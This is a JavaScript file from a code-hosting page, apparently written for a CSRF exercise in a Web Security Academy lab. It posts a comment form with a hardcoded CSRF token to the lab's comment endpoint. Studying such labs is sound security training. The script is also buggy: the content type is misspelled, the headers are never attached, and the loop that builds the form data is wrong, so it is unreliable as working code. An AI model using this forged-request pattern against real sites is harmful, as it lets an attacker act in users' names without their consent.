Inicio Explorar Axuda
Iniciar sesión
granthin
/
infosec
Seguir 1
Destacar 0
Fork 0
Ficheiros Incidencias 0 Pull Requests 0 Wiki
Rama: master
Ramas Etiquetas
infosec
/
CSRF
/
postfrom.js

postfrom.js 1.1 KB
Permalink Histórico Raw

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647 
  1. // const token = document.getElementsByName('csrf')[0].value
    2. 

  2. 

  3. 

  4. function sendFormData(formdata, url) {
    5. 

  5. 	const headers = new Headers()
    6. 

  6. 	headers.append("Content-Type", "aaplication/x-www-form-urlencoded")
    7. 

  7. 	const request = new Request(url, {
    8. 

  8. 		method: "POST",
    9. 

  9. 		body: formdata,
    10. 

  10. 	});
    11. 

  11. 	fetch(request)
    12. 

  12. 		.then((response) => {
    13. 

  13. 			if (response.status === 200) {
    14. 

  14. 				return response.json();
    15. 

  15. 			} else {
    16. 

  16. 				throw new Error("Что-то пошло не так на API сервере.");
    17. 

  17. 			}
    18. 

  18. 		})
    19. 

  19. 		.then((response) => {
    20. 

  20. 			console.debug(response);
    21. 

  21. 			// ...
    22. 

  22. 		})
    23. 

  23. 		.catch((error) => {
    24. 

  24. 			console.error(error);
    25. 

  25. 		});
    26. 

  26. }
    27. 

  27. 

  28. function createFormData(arr) {
    29. 

  29. 	let formData = new FormData();
    30. 

  30. 	for (let { key, value } in arr) {
    31. 

  31. 		formData.append(key, value);
    32. 

  32. 	}
    33. 

  33. 	return formData
    34. 

  34. }
    35. 

  35. 

  36. 

  37. let f = createFormData([
    38. 

  38. 	{ csrf: "2EdRR2skYcTW2fN3arlfvNYkk3fAfQcI" },
    39. 

  39. 	{ postId: "7" },
    40. 

  40. 	{ comment: "12345 5455454354 34543543 43534534" },
    41. 

  41. 	{ name: "=================" },
    42. 

  42. 	{ email: "adw@wedw.33" },
    43. 

  43. 	{ website: "" },
    44. 

  44. ])
    45. 

  45. 

  46. 

  47. sendFormData(f, 'https://0a5000420300e689807bee6100b5009d.web-security-academy.net/post/comment')
    48.